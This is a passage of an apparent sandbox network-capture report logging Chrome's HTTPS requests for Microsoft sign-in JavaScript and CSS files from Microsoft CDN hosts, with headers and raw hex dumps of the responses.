                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          x-azure-ref: 20241118T054741Z-1866b5c5fbblmztchC1DFWs6v4000000040g0000000029qq
                                                                                                                                          x-fd-int-roxy-purgeid: 4554691
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-18 05:47:41 UTC15587INData Raw: 1f 8b 08 00 00 00 00 00 04 00 e4 bd 6d 5b e3 38 d2 30 fa fd fe 15 c1 bb 0f 1d 4f 4c c8 0b d0 e0 b4 3b 77 1a d2 dd cc 00 61 08 cc cc 2e b0 5c 4e ac 80 bb 83 9d b5 1d 68 06 72 7e fb a9 17 c9 96 1d 87 ee d9 3d d7 f9 f2 cc 0b b1 a5 92 2c 95 aa 4a 55 a5 92 b4 f9 d3 da ff 54 7e aa 6c fc f8 3f 95 e1 79 ef ec bc 32 f8 58 39 ff 7c 78 76 50 39 85 b7 7f 54 4e 06 e7 87 fb fd 1f af 07 3f 8a ff 9f df f9 71 65 e2 4f 45 05 7e 47 6e 2c bc 4a 18 54 c2 a8 e2 07 e3 30 9a 85 91 9b 88 b8 72 0f 7f 23 df 9d 56 26 51 78 5f 49 ee 44 65 16 85 5f c4 38 89 2b 53 3f 4e a0 d0 48 4c c3 c7 4a 15 aa 8b bc ca a9 1b 25 4f 95 c3 53 b3 0e f5 0b a8 cd bf f5 03 28 3d 0e 67 4f f0 7c 97 54 82 30 f1 c7 a2 e2 06 1e d5 36 85 97 20 16 95 79 e0 89 a8 f2 78 e7 8f ef 2a c7 fe 38 0a e3 70 92 54 22 31 16
                                                                                                                                          Data Ascii: m[80OL;wa.\Nhr~=,JUT~l?y2X9|xvP9TN?qeOE~Gn,JT0r#V&Qx_IDe_8+S?NHLJ%OS(=gO|T06 yx*8pT"1
                                                                                                                                          2024-11-18 05:47:41 UTC16384INData Raw: bb 0c 77 90 36 70 02 a2 23 27 68 d7 13 77 83 5b ce 75 c8 5d 1e 38 7e d8 ef 65 93 b7 51 ba 99 a3 99 6e c4 c1 49 25 dd 80 44 6f 6d d6 5b f8 24 0d de 5f 42 cf db 25 c7 07 20 5b 70 93 25 fa 4a f2 b1 09 72 79 ab 24 b3 29 e5 95 16 1b 3c 9b e3 f6 1e bc 63 2b a7 73 9c 09 3c 7b 87 34 0e 7c c0 b3 7e cf c4 83 50 e7 60 ac d8 21 42 fd 4d eb 90 1b 4e 38 90 99 77 8e e0 d0 a6 2f bd 49 a2 b4 57 da 5c 87 87 25 cd 61 58 8e c4 2d 4e ad 5b 1a 28 47 10 3f 31 5a 3e 44 bc 65 2b c5 c3 87 fc 45 47 b6 f1 b7 8f bd 8f 7b 1f 77 8d bc 52 c5 f3 16 77 73 08 e5 a7 d2 38 b4 8d 58 7b 03 2e 80 2a 7d 95 75 9f bd f0 3c 9d e0 69 54 92 0e 40 a4 ab 30 9c 54 f3 53 f3 32 8c 02 fa 7d e9 16 60 90 4a da 17 b0 b9 c2 43 2e b7 f6 3f 0c ce 10 8a e3 b7 49 a4 a8 49 28 d5 0d 41 59 e3 36 4b e1 be dd c8 64 fa
                                                                                                                                          Data Ascii: w6p#'hw[u]8~eQnI%Dom[$_B% [p%Jry$)<c+s<{4|~P`!BMN8w/IW\%aX-N[(G?1Z>De+EG{wRws8X{.*}u<iT@0TS2}`JC.?II(AY6Kd
                                                                                                                                          2024-11-18 05:47:42 UTC16384INData Raw: 6c 5a 04 6d 94 02 7c 5f 33 90 18 0e f6 15 fb 9f fd c2 2d 7c f6 09 99 56 e0 1b df 55 00 e9 61 19 a9 ae 08 b4 08 de 5e 5e 8b 45 87 04 e9 6b b8 4e 14 17 ac 44 38 17 c4 11 e4 15 f5 05 82 e4 5a e1 00 e1 b1 7a c3 5a 2a cb eb 40 53 54 ab c1 7c ad ba a5 5c a6 6e 38 df 2e 84 c6 0f 51 3b 3d 74 de 84 36 7f d1 36 c8 68 2e a7 19 09 6f b4 0d 8a 69 11 fc 25 99 f6 55 32 25 02 a3 cd f2 e5 b9 1f 5a 92 03 c5 6a 6e d0 c6 ff b1 0d 05 a2 16 7e 06 11 d8 2f e6 d8 0b d6 12 91 54 cd 2a 90 95 47 9c 89 ce 07 af 7b 17 a7 3f 3f c1 8f fe 53 46 e8 38 88 e1 92 f5 d4 34 4b ca ff d8 a1 26 dd bc d2 22 ad b5 44 6f f6 c3 ab 20 de c6 32 0d 70 78 26 6a f3 08 a8 73 81 d6 01 20 73 48 80 a3 ea 25 4e 2a 1f eb b1 f6 d7 5d 21 e3 43 50 cc 65 af 1d a9 f7 78 ab d5 9d ad 16 9b 6a 23 b0 19 6a 77 87 19 d4
                                                                                                                                          Data Ascii: lZm|_3-|VUa^^EkND8ZzZ*@ST|\n8.Q;=t66h.oi%U2%Zjn~/T*G{??SF84K&"Do 2px&js sH%N*]!CPexj#jw
                                                                                                                                          2024-11-18 05:47:42 UTC1556INData Raw: c8 f9 f6 eb 34 7d f4 dd 37 c9 ee f7 8f f6 e2 dd 6f 66 df 7e bf fb 7d f2 f5 de 6e fc a7 bd af f7 bf 9d 3d fa d3 77 5f ff c9 21 56 2a a5 73 b5 26 36 2a 27 82 5f 12 0b 55 10 07 45 ac c1 2c da 23 56 89 cf dd 43 f9 73 20 7f 9e 75 9c 76 3f 1a ef 92 4a 90 bf 91 22 52 db 77 24 13 55 ce a9 1a 01 89 98 e7 e9 12 09 35 70 a9 69 d1 8b 04 3e 39 b8 03 34 3d 1a 1b f6 0d 11 dc b4 09 a7 5a e3 8c 8b a0 d8 8e 04 67 bc 91 4c 62 e2 2d 07 7e 93 24 60 c7 c4 68 e0 da 03 1d 6c 3c 21 5c 7a 3a 4f b3 ab 34 19 29 dd 15 7b 6b c9 37 46 ce 38 f3 54 8a b9 ab e3 f2 64 a2 b4 95 f8 ed 6f a1 2d 95 5b 98 f6 b3 12 95 75 5d 1b eb 28 7f d3 8a 79 02 81 cc da 41 13 ca b3 45 0d 0a 89 e2 cd 78 84 e3 f1 cc c7 60 84 29 31 ff 70 62 90 50 0e 31 a6 45 b5 e7 53 db ac f1 3b a1 c9 6b 77 f7 30 e5 18 a3 e1 de
                                                                                                                                          Data Ascii: 4}7of~}n=w_!V*s&6*'_UE,#VCs uv?J"Rw$U5pi>94=ZgLb-~$`hl<!\z:O4){k7F8Tdo-[u](yAEx`)1pbP1ES;kw0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          33192.168.2.165515213.107.246.454436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:42 UTC408OUTGET /shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js HTTP/1.1
                                                                                                                                          Host: aadcdn.msauth.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:43 UTC797INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:42 GMT
                                                                                                                                          Content-Type: application/x-javascript
                                                                                                                                          Content-Length: 49911
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                          Content-Encoding: gzip
                                                                                                                                          Last-Modified: Wed, 02 Oct 2024 20:05:23 GMT
                                                                                                                                          ETag: 0x8DCE31D8CF87EF9
                                                                                                                                          x-ms-request-id: 0345acd4-b01e-0059-16e7-37336a000000
                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          x-azure-ref: 20241118T054742Z-16547b76f7f5b5tthC1DFWuk840000000420000000003buh
                                                                                                                                          x-fd-int-roxy-purgeid: 4554691
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-18 05:47:43 UTC15587INData Raw: 1f 8b 08 00 00 00 00 00 04 00 e4 bd 6d 5b e3 38 d2 30 fa fd fe 15 c1 bb 0f 1d 4f 4c c8 0b d0 e0 b4 3b 77 1a d2 dd cc 00 61 08 cc cc 2e b0 5c 4e ac 80 bb 83 9d b5 1d 68 06 72 7e fb a9 17 c9 96 1d 87 ee d9 3d d7 f9 f2 cc 0b b1 a5 92 2c 95 aa 4a 55 a5 92 b4 f9 d3 da ff 54 7e aa 6c fc f8 3f 95 e1 79 ef ec bc 32 f8 58 39 ff 7c 78 76 50 39 85 b7 7f 54 4e 06 e7 87 fb fd 1f af 07 3f 8a ff 9f df f9 71 65 e2 4f 45 05 7e 47 6e 2c bc 4a 18 54 c2 a8 e2 07 e3 30 9a 85 91 9b 88 b8 72 0f 7f 23 df 9d 56 26 51 78 5f 49 ee 44 65 16 85 5f c4 38 89 2b 53 3f 4e a0 d0 48 4c c3 c7 4a 15 aa 8b bc ca a9 1b 25 4f 95 c3 53 b3 0e f5 0b a8 cd bf f5 03 28 3d 0e 67 4f f0 7c 97 54 82 30 f1 c7 a2 e2 06 1e d5 36 85 97 20 16 95 79 e0 89 a8 f2 78 e7 8f ef 2a c7 fe 38 0a e3 70 92 54 22 31 16
                                                                                                                                          Data Ascii: m[80OL;wa.\Nhr~=,JUT~l?y2X9|xvP9TN?qeOE~Gn,JT0r#V&Qx_IDe_8+S?NHLJ%OS(=gO|T06 yx*8pT"1
                                                                                                                                          2024-11-18 05:47:43 UTC16384INData Raw: bb 0c 77 90 36 70 02 a2 23 27 68 d7 13 77 83 5b ce 75 c8 5d 1e 38 7e d8 ef 65 93 b7 51 ba 99 a3 99 6e c4 c1 49 25 dd 80 44 6f 6d d6 5b f8 24 0d de 5f 42 cf db 25 c7 07 20 5b 70 93 25 fa 4a f2 b1 09 72 79 ab 24 b3 29 e5 95 16 1b 3c 9b e3 f6 1e bc 63 2b a7 73 9c 09 3c 7b 87 34 0e 7c c0 b3 7e cf c4 83 50 e7 60 ac d8 21 42 fd 4d eb 90 1b 4e 38 90 99 77 8e e0 d0 a6 2f bd 49 a2 b4 57 da 5c 87 87 25 cd 61 58 8e c4 2d 4e ad 5b 1a 28 47 10 3f 31 5a 3e 44 bc 65 2b c5 c3 87 fc 45 47 b6 f1 b7 8f bd 8f 7b 1f 77 8d bc 52 c5 f3 16 77 73 08 e5 a7 d2 38 b4 8d 58 7b 03 2e 80 2a 7d 95 75 9f bd f0 3c 9d e0 69 54 92 0e 40 a4 ab 30 9c 54 f3 53 f3 32 8c 02 fa 7d e9 16 60 90 4a da 17 b0 b9 c2 43 2e b7 f6 3f 0c ce 10 8a e3 b7 49 a4 a8 49 28 d5 0d 41 59 e3 36 4b e1 be dd c8 64 fa
                                                                                                                                          Data Ascii: w6p#'hw[u]8~eQnI%Dom[$_B% [p%Jry$)<c+s<{4|~P`!BMN8w/IW\%aX-N[(G?1Z>De+EG{wRws8X{.*}u<iT@0TS2}`JC.?II(AY6Kd
                                                                                                                                          2024-11-18 05:47:43 UTC16384INData Raw: 6c 5a 04 6d 94 02 7c 5f 33 90 18 0e f6 15 fb 9f fd c2 2d 7c f6 09 99 56 e0 1b df 55 00 e9 61 19 a9 ae 08 b4 08 de 5e 5e 8b 45 87 04 e9 6b b8 4e 14 17 ac 44 38 17 c4 11 e4 15 f5 05 82 e4 5a e1 00 e1 b1 7a c3 5a 2a cb eb 40 53 54 ab c1 7c ad ba a5 5c a6 6e 38 df 2e 84 c6 0f 51 3b 3d 74 de 84 36 7f d1 36 c8 68 2e a7 19 09 6f b4 0d 8a 69 11 fc 25 99 f6 55 32 25 02 a3 cd f2 e5 b9 1f 5a 92 03 c5 6a 6e d0 c6 ff b1 0d 05 a2 16 7e 06 11 d8 2f e6 d8 0b d6 12 91 54 cd 2a 90 95 47 9c 89 ce 07 af 7b 17 a7 3f 3f c1 8f fe 53 46 e8 38 88 e1 92 f5 d4 34 4b ca ff d8 a1 26 dd bc d2 22 ad b5 44 6f f6 c3 ab 20 de c6 32 0d 70 78 26 6a f3 08 a8 73 81 d6 01 20 73 48 80 a3 ea 25 4e 2a 1f eb b1 f6 d7 5d 21 e3 43 50 cc 65 af 1d a9 f7 78 ab d5 9d ad 16 9b 6a 23 b0 19 6a 77 87 19 d4
                                                                                                                                          Data Ascii: lZm|_3-|VUa^^EkND8ZzZ*@ST|\n8.Q;=t66h.oi%U2%Zjn~/T*G{??SF84K&"Do 2px&js sH%N*]!CPexj#jw
                                                                                                                                          2024-11-18 05:47:43 UTC1556INData Raw: c8 f9 f6 eb 34 7d f4 dd 37 c9 ee f7 8f f6 e2 dd 6f 66 df 7e bf fb 7d f2 f5 de 6e fc a7 bd af f7 bf 9d 3d fa d3 77 5f ff c9 21 56 2a a5 73 b5 26 36 2a 27 82 5f 12 0b 55 10 07 45 ac c1 2c da 23 56 89 cf dd 43 f9 73 20 7f 9e 75 9c 76 3f 1a ef 92 4a 90 bf 91 22 52 db 77 24 13 55 ce a9 1a 01 89 98 e7 e9 12 09 35 70 a9 69 d1 8b 04 3e 39 b8 03 34 3d 1a 1b f6 0d 11 dc b4 09 a7 5a e3 8c 8b a0 d8 8e 04 67 bc 91 4c 62 e2 2d 07 7e 93 24 60 c7 c4 68 e0 da 03 1d 6c 3c 21 5c 7a 3a 4f b3 ab 34 19 29 dd 15 7b 6b c9 37 46 ce 38 f3 54 8a b9 ab e3 f2 64 a2 b4 95 f8 ed 6f a1 2d 95 5b 98 f6 b3 12 95 75 5d 1b eb 28 7f d3 8a 79 02 81 cc da 41 13 ca b3 45 0d 0a 89 e2 cd 78 84 e3 f1 cc c7 60 84 29 31 ff 70 62 90 50 0e 31 a6 45 b5 e7 53 db ac f1 3b a1 c9 6b 77 f7 30 e5 18 a3 e1 de
                                                                                                                                          Data Ascii: 4}7of~}n=w_!V*s&6*'_UE,#VCs uv?J"Rw$U5pi>94=ZgLb-~$`hl<!\z:O4){k7F8Tdo-[u](yAEx`)1pbP1ES;kw0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          34192.168.2.1655158152.199.21.1754436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:44 UTC660OUTGET /ests/2.1/content/cdnbundles/converged.v2.login.min_nin8k2ycrbzww8zl5vxkaq2.css HTTP/1.1
                                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          Origin: https://login.microsoftonline.com
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                          Referer: https://login.microsoftonline.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:44 UTC734INHTTP/1.1 200 OK
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                          Age: 4547932
                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                          Content-MD5: 8N6amNvfqMAnQs5tkvslJA==
                                                                                                                                          Content-Type: text/css
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:44 GMT
                                                                                                                                          Etag: 0x8DCDDAB171F8006
                                                                                                                                          Last-Modified: Wed, 25 Sep 2024 21:43:27 GMT
                                                                                                                                          Server: ECAcc (lhc/78AC)
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          X-Cache: HIT
                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                          x-ms-request-id: 541c8d22-201e-00d2-0520-100289000000
                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                          Content-Length: 113378
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-18 05:47:45 UTC16383INData Raw: 2f 2a 21 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2a 2f 2f 2a 21 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 74 73 20 6c 69 73 74 65 64 20
                                                                                                                                          Data Ascii: /*! Copyright (C) Microsoft Corporation. All rights reserved. *//*!------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------This file is based on or incorporates material from the projects listed
                                                                                                                                          2024-11-18 05:47:45 UTC16383INData Raw: 73 2d 31 2c 2e 63 6f 6c 2d 78 73 2d 32 2c 2e 63 6f 6c 2d 78 73 2d 33 2c 2e 63 6f 6c 2d 78 73 2d 34 2c 2e 63 6f 6c 2d 78 73 2d 35 2c 2e 63 6f 6c 2d 78 73 2d 36 2c 2e 63 6f 6c 2d 78 73 2d 37 2c 2e 63 6f 6c 2d 78 73 2d 38 2c 2e 63 6f 6c 2d 78 73 2d 39 2c 2e 63 6f 6c 2d 78 73 2d 31 30 2c 2e 63 6f 6c 2d 78 73 2d 31 31 2c 2e 63 6f 6c 2d 78 73 2d 31 32 2c 2e 63 6f 6c 2d 78 73 2d 31 33 2c 2e 63 6f 6c 2d 78 73 2d 31 34 2c 2e 63 6f 6c 2d 78 73 2d 31 35 2c 2e 63 6f 6c 2d 78 73 2d 31 36 2c 2e 63 6f 6c 2d 78 73 2d 31 37 2c 2e 63 6f 6c 2d 78 73 2d 31 38 2c 2e 63 6f 6c 2d 78 73 2d 31 39 2c 2e 63 6f 6c 2d 78 73 2d 32 30 2c 2e 63 6f 6c 2d 78 73 2d 32 31 2c 2e 63 6f 6c 2d 78 73 2d 32 32 2c 2e 63 6f 6c 2d 78 73 2d 32 33 2c 2e 63 6f 6c 2d 78 73 2d 32 34 7b 66 6c 6f 61 74 3a
                                                                                                                                          Data Ascii: s-1,.col-xs-2,.col-xs-3,.col-xs-4,.col-xs-5,.col-xs-6,.col-xs-7,.col-xs-8,.col-xs-9,.col-xs-10,.col-xs-11,.col-xs-12,.col-xs-13,.col-xs-14,.col-xs-15,.col-xs-16,.col-xs-17,.col-xs-18,.col-xs-19,.col-xs-20,.col-xs-21,.col-xs-22,.col-xs-23,.col-xs-24{float:
                                                                                                                                          2024-11-18 05:47:45 UTC16383INData Raw: 72 67 69 6e 2d 6c 65 66 74 3a 39 35 2e 38 33 33 33 33 25 7d 2e 63 6f 6c 2d 78 6c 2d 6f 66 66 73 65 74 2d 32 34 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 30 25 7d 7d 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 69 6e 2d 77 69 64 74 68 3a 30 7d 6c 65 67 65 6e 64 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 7d 6c 61 62 65 6c 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62
                                                                                                                                          Data Ascii: rgin-left:95.83333%}.col-xl-offset-24{margin-left:100%}}fieldset{padding:0;margin:0;border:0;min-width:0}legend{display:block;width:100%;padding:0;border:0}label{display:inline-block;max-width:100%}input[type="search"]{-webkit-box-sizing:border-box;-moz-b
                                                                                                                                          2024-11-18 05:47:45 UTC16383INData Raw: 66 6c 6f 77 2d 78 3a 61 75 74 6f 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2e 30 31 25 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 33 39 70 78 29 7b 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 7b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 35 70 78 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 68 69 64 64 65 6e 3b 2d 6d 73 2d 6f 76 65 72 66 6c 6f 77 2d 73 74 79 6c 65 3a 2d 6d 73 2d 61 75 74 6f 68 69 64 69 6e 67 2d 73 63 72 6f 6c 6c 62 61 72 7d 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 3e 2e 74 61 62 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 3e 2e 74 61 62 6c 65 3e 74 68 65 61 64 3e 74 72 3e 74 68 2c 2e 74 61
                                                                                                                                          Data Ascii: flow-x:auto;min-height:.01%}@media screen and (max-width:539px){.table-responsive{width:100%;margin-bottom:15px;overflow-y:hidden;-ms-overflow-style:-ms-autohiding-scrollbar}.table-responsive>.table{margin-bottom:0}.table-responsive>.table>thead>tr>th,.ta
                                                                                                                                          2024-11-18 05:47:45 UTC4INData Raw: 55 49 22 2c
                                                                                                                                          Data Ascii: UI",
                                                                                                                                          2024-11-18 05:47:45 UTC16383INData Raw: 22 54 75 6e 67 61 22 2c 22 4c 61 6f 20 55 49 22 2c 22 52 61 61 76 69 22 2c 22 49 73 6b 6f 6f 6c 61 20 50 6f 74 61 22 2c 22 4c 61 74 68 61 22 2c 22 4c 65 65 6c 61 77 61 64 65 65 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 20 55 49 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 4a 68 65 6e 67 48 65 69 20 55 49 22 2c 22 4d 61 6c 67 75 6e 20 47 6f 74 68 69 63 22 2c 22 45 73 74 72 61 6e 67 65 6c 6f 20 45 64 65 73 73 61 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 48 69 6d 61 6c 61 79 61 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 4e 65 77 20 54 61 69 20 4c 75 65 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 50 68 61 67 73 50 61 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 54 61 69 20 4c 65 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 59 69 20 42 61 69 74 69 22 2c 22 4d 6f 6e 67 6f 6c 69
                                                                                                                                          Data Ascii: "Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongoli
                                                                                                                                          2024-11-18 05:47:45 UTC16383INData Raw: 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 35 64 61 36 7d 2e 62 74 6e 2e 62 74 6e 2d 70 72 69 6d 61 72 79 2d 66 6f 63 75 73 2c 2e 62 74 6e 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 66 6f 63 75 73 2c 62 75 74 74 6f 6e 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 5d 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 5d 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 66 6f 63 75 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 35 64 61 36 3b 74 65 78 74 2d 64 65 63 6f 72 61
                                                                                                                                          Data Ascii: :hover{background-color:#005da6}.btn.btn-primary-focus,.btn.btn-primary:focus,button.btn-primary:focus,input[type="button"].btn-primary:focus,input[type="submit"].btn-primary:focus,input[type="reset"].btn-primary:focus{background-color:#005da6;text-decora
                                                                                                                                          2024-11-18 05:47:45 UTC15076INData Raw: 2d 62 6f 74 74 6f 6d 3a 32 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 32 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 2e 32 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 38 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 37 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 2e 33 36 33 32 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 2e 33 36 33 32 70 78 3b 63 6f 6c 6f 72 3a 23 31 62 31 62 31 62 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 36 70 78
                                                                                                                                          Data Ascii: -bottom:20px;margin-top:20px;margin-bottom:1.25rem;margin-top:1.25rem;font-size:24px;line-height:28px;font-weight:300;line-height:1.75rem;padding-bottom:2.3632px;padding-top:2.3632px;color:#1b1b1b;font-size:1.5rem;font-weight:600;padding:0;margin-top:16px


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          35192.168.2.1655159152.199.21.1754436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:44 UTC637OUTGET /shared/1.0/content/js/ConvergedLogin_PCore_IzDt-l0Cuie0gYRUoEk15w2.js HTTP/1.1
                                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          Origin: https://login.microsoftonline.com
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://login.microsoftonline.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
